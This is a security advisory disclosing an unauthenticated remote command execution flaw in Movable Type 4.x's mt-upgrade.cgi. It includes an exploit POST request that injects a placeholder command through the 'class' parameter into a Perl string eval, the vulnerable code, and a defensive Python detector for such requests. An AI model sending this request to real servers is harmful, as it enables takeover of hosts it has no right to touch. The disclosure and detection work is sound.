Moveable Type 4.x Unauthenticated Remote Command Execution

Sec-1 Security Advisory
Advisory Name : Moveable Type 4.x Unauthenticated Remote Command Execution via mt-upgrade.cgi
Discovery Date : 7/11/2012
Release Date : 22/1/2013
Application : Moveable Type 4.x
Platform : Any
Severity : HIGH. Unauthenticated Remote Command Execution
CVE : CVE-2013-0209 CVE-2012-6315
Discovered by : Nick Blundell
Vendor Status : Released patch for unmaintained 4.x branch
Website : http://www.sec-1.com/blog
Vulnerability Summary:
By directly calling an update-related CGI script with crafted input, and without requiring authentication, it is possible to execute arbitrary system commands on the host server.
MoveableType (MT) exposes a CGI script, mt-upgrade.cgi (usually at /cgi/mt/mt-upgrade.cgi), that is used during installation and updating of the platform. The vulnerability arises due to the following properties:

  1. This script may be invoked remotely without requiring authentication to any MT instance.
  2. Through a crafted POST request, it is possible to invoke particular database migration functions (i.e. functions that bring the existing database up-to-date with an updated codebase) by name and with particular parameters.
  3. A particular migration function, core_drop_meta_for_table, allows a class parameter to be set which is used directly in a perl eval statement, allowing perl code injection.
Exploit Example:
With the following POST request we can gain unauthenticated code execution on the hosting server:

POST /cgi/mt/mt-upgrade.cgi HTTP/1.1
Host: [mt host name here]
Proxy-Connection: keep-alive
User-Agent: Mozilla/5...
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

__mode=run_actions&installing=1&steps=
[["core_drop_meta_for_table","class","`COMMAND_PAYLOAD_HERE`"]]
Vulnerable Code:
The vulnerable code lies in: lib/MT/Upgrade.pm

sub core_drop_meta_for_table {
    my $self = shift;
    my (%param) = @_;
    my $class = $param{class};
    my $sql = $param{sql};
    eval "require $class;";            # <----------- request-controlled $class is interpolated into a string eval
    my $driver = $class->dbi_driver;
    my $dbh = $driver->rw_handle;
    my $err;
    eval {
        $dbh->do($sql) or $err = $dbh->errstr;
    };
    # ignore drop errors; the column has probably been
    # removed already
    #if ($err) {
    #    print STDERR "$err: $sql\n";
    #}
    return 0;
}
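The two things a defender needs from the request format above and from the vulnerable code are the same check: does the "class" parameter handed to core_drop_meta_for_table look like a Perl package name, or like something that will be executed when interpolated into eval? The following Python is an added example written for this advisory; it is not Sec-1's or the vendor's code. It decodes an mt-upgrade.cgi POST body the way the exploit request is laid out (form-urlencoded, "steps" as a JSON list of [function, key, value, ...]), and flags any core_drop_meta_for_table step whose class fails a package-name pattern. The pattern SAFE_CLASS_RE and the sample bodies are this example's own assumptions; the benign sample uses "MT::Entry" purely as a plausible class name.

```python
import json
import re
from urllib.parse import parse_qs, urlencode

# Assumption of this example: a legitimate "class" value is a bare Perl package
# name such as Foo::Bar. Anything else (backticks, semicolons, spaces, quotes)
# would be interpreted by `eval "require $class;"` as code, not as a module name.
SAFE_CLASS_RE = re.compile(r"^[A-Za-z_]\w*(?:::[A-Za-z_]\w*)*$")


def parse_steps(body):
    """Decode a form-urlencoded mt-upgrade.cgi body and return the requested
    migration steps as (function_name, {param: value}) tuples."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("__mode", [""])[0] != "run_actions":
        return []
    try:
        steps = json.loads(form.get("steps", [""])[0])
    except ValueError:
        return []
    if not isinstance(steps, list):
        return []
    result = []
    for step in steps:
        if not isinstance(step, list) or not step:
            continue
        name = str(step[0])
        args = step[1:]
        # Remaining elements are key, value pairs; a trailing odd key is ignored.
        params = {str(args[i]): args[i + 1] for i in range(0, len(args) - 1, 2)}
        result.append((name, params))
    return result


def classify_request(body):
    """Return a list of finding strings for one request body (empty = nothing
    suspicious). Only the injection sink from the advisory is modelled."""
    findings = []
    for name, params in parse_steps(body):
        if name == "core_drop_meta_for_table":
            cls = str(params.get("class", ""))
            if not SAFE_CLASS_RE.match(cls):
                findings.append(
                    "core_drop_meta_for_table called with non-package class value: %r" % cls
                )
    return findings


# Constructed sample bodies (not captured traffic). The hostile one mirrors the
# advisory's request shape with the command placeholder left as a placeholder.
BENIGN_BODY = urlencode({
    "__mode": "run_actions",
    "installing": "1",
    "steps": json.dumps([["core_drop_meta_for_table", "class", "MT::Entry",
                          "sql", "ALTER TABLE mt_entry DROP COLUMN entry_meta"]]),
})
MALICIOUS_BODY = urlencode({
    "__mode": "run_actions",
    "installing": "1",
    "steps": json.dumps([["core_drop_meta_for_table", "class", "`COMMAND_PAYLOAD_HERE`"]]),
})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY)):
        print(label, classify_request(body) or "no findings")
```

This only works where the POST body is visible (a reverse proxy, WAF or IDS in front of the CGI), since a plain access log records the path but not the form fields. The same SAFE_CLASS_RE test is also the minimal input validation a patched core_drop_meta_for_table would need to apply before reaching the string eval, independent of whether mt-upgrade.cgi is reachable without authentication.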
Exploit Code:
Metasploit exploit: movabletype_upgrade_exec.rb
Author(s): Kacper Nowak
Vendor Response:
Although the vendors no longer actively maintain the 4.x branch, they have published a patch to fix the issue: http://www.movabletype.org/2013/01/movable_type_438_patch.html
Copyright 2013 Sec-1 LTD. All rights reserved.